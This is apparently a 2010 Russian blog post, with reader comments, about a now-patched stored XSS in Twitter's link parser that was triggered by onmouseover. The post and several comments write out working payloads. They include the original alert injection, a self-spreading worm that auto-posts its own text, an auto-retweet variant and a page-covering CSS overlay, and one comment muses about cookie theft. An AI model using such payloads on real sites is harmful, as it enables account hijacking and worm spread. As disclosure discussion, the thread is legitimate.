21 сентября 2010 в 14:38

Активная XSS на Twitter

Скриншот (спасибо lc0d3r):

image
Пример: twitter.com/mr_the/status/25105420721 (там только alert)

Началось всё отсюда (банальное раскрашивание через css) twitter.com/RainbowTwtr, автор не известен.

Достаточно отпостить твитт вида:
http://twitter.com/mr_the#@"onmouseover="jAvascript:alert('Ha-ha! XSS!');"/
и будет много-много радости.

Собственно причина — плохой парсер ссылок, без должной фильтрации.

В целях безопасности, рекомендую временно отключить выполнение JavaScript на twitter.com.

UPD: В NewTwitter xss не работает.
UPD2: На 15:52 (по Киеву) закрыли возможность отправлять подобные твитты. Старые всё ещё работают.
UPD3: 16:46 по Киеву, уязвимость официально закрыли — status.twitter.com/post/1161435117/xss-attack-identified-and-patched
+107
409
15
mrThe 18,5

Комментарии (105)

+2
n3m0 #
Молодец!

Фильтруйте все данные приходящие от пользователя!!!
+1
ShamanS #
В NewTwitter — работает все еще! При открытии нет, но когда идет обновление, через каждые n секунд выдается alert.
0
gladkij #
Мне вот такую штуку послали (пробел после http надо убрать):

http ://t.co/@«onmouseover=»document.getElementById('status').value='RT MoiMrJack';$('.status-update-form').submit();«font-size:500pt;/
+1
halkfild #
Это такой маркетинговый ход, чтобы все переходили на новую версию твиттера, так как там это не работает :)

Кстати, так можно спастить от бага до офф. фикса
+3
mrThe #
Проблема в том, что возможность перейти на новый твиттер есть далеко не у всех)
+1
avatar2009 #
А у кого?
+2
mrThe #
У избранных великим рандомом! Во всяком случае, в моей ленте новый твиттер может включить всего несколько человек, включая меня.
0
hesherr #
А как ты его включаешь? Через настройки?
0
homm #
А как вообще узнать, есть у меня эта возможность, или нет?
+7
mrThe #
Сверху появится вот такая кнопочка:
+1
avatar2009 #
Может, если подделать кнопочку у себя, она и у других включится?
0
mrThe #
Проверяли уже — не включается. По клику идёт вот такое обращение: twitter.com/account/use_phx?setting=true
Попробуйте, вдруг получится.
0
avatar2009 #
Все-таки нет. Ничего, скоро и на нашей улице будет праздник.
0
DeeZ #
А у меня сработало и включилось. Спасибо!
Предложения как на скриншоте выше у меня не было.
+2
mrThe #
Кстати, у меня это предложение блокировал один из плагинов)
0
hesherr #
Понятно, спасибо!
+7
greengarlic #
хреноватенькие тестеры у них
0
Dr_Logic #
Им походу нужно форсировать распространение новой версии. Если она так долго по серверам ползет, как долго будет распространяться фикс?
+1
Dr_Logic #
А ведь стоит написать короткий скрипт, и добавить к нему трендовый хештег — и можно насобирать кучу кукисов. Кукисы с твиттера чегонибудь дают?
–1
SvnWeb #
сморя че в них хранится
0
alekztrz #
Авторизация хранится. Можно зайти под чужим аккаунтом, подменив куки.
+3
noRerih #
некоторые сайты используют для авторизации твиттеровский OAuth
0
loshvitalik #
Так, черт, я туплю :) Пытался дотянуться до крестика вкладки, проводя мышь напрямую, через ссылку, уберите это :)
0
Zubchick #
Разноцветные твиты twitter.com/RainbowTwtr появились у меня на странице, сразу все одновременно, хотя я этого RainbowTwtr не фоловил. Через минуту они исчезли.
+2
jtraub #
Значит кто-то из тех кого вы фолловите ретвитнул сообщения RainbowTwtr, а потом нажал Undo
+3
biophreak #
twitter.com/biophreak у меня теперь настоящий коммунистический твиттер (:
+1
homm #
А теперь то же самое с хеш-тегом, например #prinsjesdag
0
biophreak #
с хештегом не работает — постит текстом… либо у меня руки не оттуда :)
Можете попробовать, если че:
twitter.com/thenickname#@"style="background-color:red;color:red;position:fixed;left:0;top:0;width:100%;height:100%;z-index:9999999"/
0
Ag0nizer #
Баги твиттера иногда задалбывают. Вроде кучу денег вложили в проект, почему так трудно довести его до ума?
+12
Requilence #

Переходим на CSS3 ;-)
+17
Requilence #
Новый тренд. Самое впечатляющее JS-приложение в 140 символах.
+1
biophreak #
меньше, там еще ссылка, собачка, решетка, и мелочи всякие (:
0
land #
возвращаемся к временам ASM, приложение в минимальном количестве символов )
0
n3m0 #
Я вижу используют эту xss. Давайте хоть тег писать #twitter_xss?
+2
land #
символов и так мало ))
0
dohlik #
Noscript как бе говорит «пофигу» ))
НЛО прилетело и опубликовало эту надпись здесь
+2
mcm69 #
всё, черви пошли. не ходите на вебморду
+6
homm #
Twi-вирус:
http: //a.no/@"onmouseover=";$('textarea:first').val
(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/
0
chaliy #
Аха, уже вся лента забита. Прикольно.
+1
gl00k #
Мне пришел авторетвит: habreffect.ru/files/ba1/06e3909e1/rt.png
Наводишь мышку и автоматом ретвитишь.
0
biophreak #
А никто не пробовал еще размещать js на внешних ресурсах и подгружать их?
0
artem_kovardin #
хм…
0
biophreak #
просто в таком случае можно-же будет вешать события не на mouseover, а, скажем на mousemove и так далее
0
land #
ссылка выше на twitter.com/superbacker у него есть такие попытки, наводить проверять не стал )))
0
biophreak #
Ха, работает… бугагашенька…
0
lol2Fast4U #
+1
artem_kovardin #
Мужики, хорош херней страдать! Лента в твиттере уже совсем нечитаема
0
biophreak #
ну когда еще такое будет… ща наиграются все и надоест )
+1
biophreak #
это же старая дырка… там клиент не фильтровался вроде.
0
mrThe #
Это старая уязвимость.
НЛО прилетело и опубликовало эту надпись здесь
–1
Volgarik #
это не акк балуется, а твивирус распространется.
НЛО прилетело и опубликовало эту надпись здесь
–1
voidby #
А какой командой удаляются аккаунты? :)
0
Volgarik #
Сейчас лучше вообще не заходить на веб-морду, запросто вирусняк подцепишь.
+1
lol2Fast4U #
Хватит во зло использовать, смотрите и радуйтесь: twitter.com/myfreeweb/statuses/25112218506
0
Demir0 #
Что там было?)
+1
lol2Fast4U #
+1
dima_smol #
В ленте пипец просто настал.
Спас Firebug…
–5
GliX #
Я понимаю когда найденную довольно опасную уязвимость используют обычные пользователи. Но когда крупная компания, которая стремилась создать себе на Хабре «имя» тоже начинает грешить этим — это переходит все грани. И этой самой фирмой, как ни удивительно, снова оказалась Вконтакте. Вот скриншот:



А вот тут можно глянуть исходный код, дабы исключить фальсификации. И я даже догадываюсь кто это сделал.
+6
Volgarik #
крупная компания грешит ламерством
–2
GliX #
Это весьма заметно. Сообщение больше 10 минут не удалялось, да и почти одновременно последовавший ретвит несколько другого сообщения от самого Цыплухина как бы намекает. Понабирали по объявлениям…
0
javac #
Дуров, кто-же еще =)
+9
antanubis #
Забавно, даже когда пишут пост о критической уязвимости на сайте twitter.com, доблестные хабра-юзеры умудряются найти повод написать про то, какой нехороший сайт vkontakte.ru.
+3
ajaxtelamonid #
так это они зашли в свой твиттер через морду и словили хак, который отретвитился дальше, разве нет?
0
hellveen #
Хотите сказать, что Вконтакте преднамеренно это сделала?
–1
GliX #
За менее чем десять минут можно было сообщение удалить? Вроде как люди не совсем далекие от темы, должны были сообразить что это значит.
0
Assoulter #
Попался два раза на авторетвите. Firebug помог.
А вообще, mobile.twitter.com и никаких глюков в веб-морде :)
0
Centro #
«В целях безопасности, рекомендую временно отключить выполнение Javascript на twitter.com.»
Твиттер без скрипта не работает.
0
Centro #
В целях безопасности сейчас лучше всего использовать внешние клиенты.
0
Pechkin1007 #
Вся лента теперь в этих отправлениях.
НЛО прилетело и опубликовало эту надпись здесь
+5
xoralex #
новая твиттер версия упячка
0
EvgeniyLazarev #
Всё, уже вылечили.

Кто-нибудь может подсказать, как расшифровываются подобные строки? (переходить не рекомендую, возможно вирус):
http:\u002f\u002fis.gd\u002ffl9A7
0
hormold #
0
Volgarik #
старые посты продолжают действовать
0
ArtemPugachev #
<script language="javascript">
	document.write('http:\u002f\u002fis.gd\u002ffl5d3')
</script>
+1
ArtemPugachev #
сорри, это был ответ на сообщение EvgeniyLazarev
0
Sma11erM1nd #
0
Jeditobe #
Что оно делает?
–4
DYPA #
уже достало говорить что пора юзать dabr.co.uk или sexymonday.ru/dabr
+4
Volgarik #
уже достало
+3
Maljar #
Новое приложение Твиттера «RainbowTwtr» по популярности затмило «Ферму». ВКонтакте — рыдает :)
+1
XPyCT #
+2
lol2Fast4U #
Ты украл мой код! twitter.com/myfreeweb/statuses/25112218506 см. время
0
halkfild #
Ну вот и пофиксили
+5
Mad_D #
Ждём, когда @KremlinRussia ретвитнет радугу :)
0
MakeInstall #
или @KermlinRussia :)
НЛО прилетело и опубликовало эту надпись здесь
+6
sidristij #
Почему до сих пор нет Властелина?
0
WuWu #
@ekozlov, @Unlevin, @alexa_cocacola — заставляют ретвить их посты скриптом всех кто за ними следует. Побанить бы их всех за такое… Бедный твиттер
НЛО прилетело и опубликовало эту надпись здесь
НЛО прилетело и опубликовало эту надпись здесь
0
ajaxtelamonid #
Это не они, это скрипт сам рассылает эти твиты. Ретвитит сам себя и так распространяется.
+1
mirniy #
Вообще-то уже браузер сам ретвитет кого угодно. Ахтунг. Закрываем твиттер и отдыхаем.
0
SergiuZZZ #
У меня тоже браузер сам сделал ретвит кода, ретвитов 100+. при этом home, странно себя ведет, делает редирект на direct messages.
0
Demir0 #
Вот, это и я зацепил.
+1
homm #
Я просто оставлю это здесь:
mobile.twitter.com/
НЛО прилетело и опубликовало эту надпись здесь
+1
root_sashok #
Я горжусь, что меня фолловит @mr_the :D
+2
XPyCT #
Пофиксили. Расходимся (:
–7
spam #
кому это интересно? Твиттеры вместе с вконтактами пора поставить на пыльную полочку и забыть о них.
+1
donlimon #
А у меня после всех этих забав, главная твиттера выглядит вот так,

Только зарегистрированные пользователи могут оставлять комментарии. Войдите, пожалуйста.